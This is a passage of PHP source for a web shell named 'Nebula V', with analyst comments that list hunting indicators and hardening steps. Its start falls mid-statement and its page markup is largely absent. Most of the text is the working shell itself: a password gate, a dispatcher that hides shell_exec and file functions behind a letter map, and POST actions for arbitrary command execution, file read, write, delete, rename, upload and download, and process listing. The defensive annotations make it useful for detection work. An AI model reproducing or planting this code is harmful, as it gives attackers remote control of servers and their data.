'destroyed'])); }
// NOTE(review): the fragment above is the tail of a statement that begins
// before this view; it is left as-is and not documented here.
//
// Analyst summary: what follows is the server side of a PHP web shell.
// After a password gate it exposes command execution and arbitrary file
// read/write/delete/rename/upload/download to whoever holds the key.
// A file like this on a production host should be treated as evidence of
// compromise, not as an admin tool.
//
// Hunting indicators visible in this view:
//   - session keys 'nebula_auth' and 'cwd'
//   - POST parameters 'k' (login key), 'req' (action selector), 'c', 'f',
//     'path', 'old', 'new', and an uploaded file field named 'file'
//   - action names: cmd, list, read, save, del, rename, upload, ps, download
//   - a single-letter => function-name map called through a variable function
//   - shell_exec() with " 2>&1" appended, and a fixed 'ps aux' call
// Hardening that limits this class of file: disabling shell_exec/exec in
// disable_functions where the application does not need them, keeping the
// web root non-writable for the PHP user, and file-integrity monitoring
// on deployed code.

// Logout: destroys the session and redirects to the same URL with the
// query string stripped (strtok on '?').
if (isset($_GET['logout'])) {
    session_destroy();
    header('Location: '.strtok($_SERVER['REQUEST_URI'], '?'));
    exit;
}

// Password gate. The POSTed 'k' value is hashed with SHA-256 and compared
// to $auth_hash, which is defined outside this view. On success the session
// is marked authenticated and the working directory is recorded.
// NOTE(review): the $auth_hash literal elsewhere in the file is presumably a
// per-sample constant and would be a useful value for finding other copies.
if (!isset($_SESSION['nebula_auth'])) {
    if (isset($_POST['k']) && hash('sha256', $_POST['k']) === $auth_hash) {
        $_SESSION['nebula_auth'] = true;
        $_SESSION['cwd'] = getcwd();
    } else {
        // Clear the output buffer for the login screen output
        ob_end_clean();
        // The login page markup that belonged inside this string is not
        // present in this view; only a line break remains.
        die('
');
    }
}

// 4. Core
/**
 * Thin dispatcher over PHP's process and filesystem functions.
 *
 * r() maps a single-letter key to a function name and invokes it as a
 * variable function, so the sensitive function names appear only as string
 * literals in the map. The key 'x' is special-cased to shell_exec() with
 * stderr merged into stdout. In this view the only caller is the 'cmd'
 * handler, which uses key 'x'.
 */
class Core {
    /**
     * @param string $n   selector: 'x' for a shell command, otherwise a key of the map below
     * @param mixed ...$a arguments forwarded unchanged to the selected function
     * @return mixed      whatever the selected function returns
     */
    public function r($n, ...$a) {
        $m = ['e'=>'exec', 's'=>'scandir', 'f'=>'file_get_contents', 'w'=>'file_put_contents', 'r'=>'rename', 'u'=>'unlink', 'c'=>'chmod'];
        // 'x': run the first argument through the shell, capturing stderr too.
        if($n=='x') return shell_exec($a[0]." 2>&1");
        // Any other key: look up the function name and call it indirectly.
        return ($m[$n])(...$a);
    }
}
$sys = new Core();

// Restore the per-session working directory; fall back to the script's
// directory when the stored one is missing or no longer a directory.
if(!isset($_SESSION['cwd']) || !is_dir($_SESSION['cwd'])) $_SESSION['cwd'] = getcwd();
@chdir($_SESSION['cwd']);

// 5. API
// Every action below is selected by POST 'req' and takes its paths and
// command text directly from POST fields without any restriction, so the
// reachable scope is whatever the PHP process user can access. POST bodies
// are often absent from access logs; request-body logging or process
// telemetry (shell children of the web server process) is what typically
// shows this activity.
if (isset($_POST['req'])) {
    // Clear the buffer before the JSON response (critical!)
    ob_clean();
    $req = $_POST['req'];
    if($req !== 'download') header('Content-Type: application/json');

    // cmd: run POST 'c'. A leading "cd <dir>" is handled in-process so the
    // directory change persists in the session; an empty target becomes '/'.
    // Anything else goes to the shell via Core::r('x', ...).
    if ($req === 'cmd') {
        $cmd = $_POST['c'];
        $out = '';
        if (preg_match('/^cd\s+(.*)$/', $cmd, $m)) {
            $target = trim($m[1]);
            if($target == '') $target = '/';
            if (@chdir($target)) {
                $_SESSION['cwd'] = getcwd();
            } else {
                $out = "cd: error: $target";
            }
        } else {
            $out = $sys->r('x', $cmd);
        }
        echo json_encode(['out' => $out, 'cwd' => $_SESSION['cwd']]);
        exit;
    }

    // list: directory listing of POST 'path' (default: session cwd). Also
    // makes that path the new session cwd. Each entry carries name, is-dir
    // flag, size in KB ('-' for directories) and the last four octal
    // permission digits. '.' is skipped; '..' is kept.
    if ($req === 'list') {
        $path = $_POST['path'] ?? $_SESSION['cwd'];
        if(empty($path)) $path = $_SESSION['cwd'];
        if(is_dir($path)) {
            @chdir($path);
            $_SESSION['cwd'] = $path;
            $items = @scandir($path);
            $res = [];
            if($items) {
                foreach($items as $i) {
                    if($i == '.') continue;
                    $p = $path . DIRECTORY_SEPARATOR . $i;
                    $stat = @stat($p);
                    // The size suffix literal below contains a line break in
                    // this view; it is kept exactly as found.
                    $res[] = [ 'n' => $i, 'd' => is_dir($p), 's' => is_dir($p) ? '-' : round(($stat['size']??0)/1024, 2).' 
KB', 'p' => substr(sprintf('%o', fileperms($p)), -4), ];
                }
            }
            echo json_encode(['files' => $res, 'cwd' => $path]);
        } else {
            echo json_encode(['error' => 'Path Error']);
        }
        exit;
    }

    // read: returns the contents of POST 'f', base64-encoded, in JSON.
    if ($req === 'read') {
        $c = @file_get_contents($_POST['f']);
        echo json_encode(['data' => base64_encode($c)]);
        exit;
    }

    // save: writes base64-decoded POST 'c' to POST 'f'; 'status' is the
    // file_put_contents() result (byte count or false).
    if ($req === 'save') {
        echo json_encode(['status' => @file_put_contents($_POST['f'], base64_decode($_POST['c']))]);
        exit;
    }

    // del: deletes POST 'f'.
    if ($req === 'del') {
        echo json_encode(['status' => @unlink($_POST['f'])]);
        exit;
    }

    // rename: moves POST 'old' to POST 'new'.
    if ($req === 'rename') {
        echo json_encode(['status' => @rename($_POST['old'], $_POST['new'])]);
        exit;
    }

    // upload: stores the uploaded 'file' in the session cwd under the
    // client-supplied name; no response body is sent.
    if ($req === 'upload') {
        @move_uploaded_file($_FILES['file']['tmp_name'], $_SESSION['cwd'] . DIRECTORY_SEPARATOR . $_FILES['file']['name']);
        exit;
    }

    // ps: returns the output of a fixed 'ps aux' shell call.
    if ($req === 'ps') {
        echo json_encode(['out' => @shell_exec('ps aux')]);
        exit;
    }

    // download: streams POST 'f' as an attachment (the only action that
    // does not set the JSON content type above).
    if ($req === 'download') {
        $f = $_POST['f'];
        if(file_exists($f)){
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename="'.basename($f).'"');
            header('Content-Length: '.filesize($f));
            readfile($f);
        }
        exit;
    }

    // Unknown 'req' values end the request with no output.
    exit;
}

// Clear the buffer before page output, but do not close it
ob_clean(); ?> Nebula V
NameSizePermsActions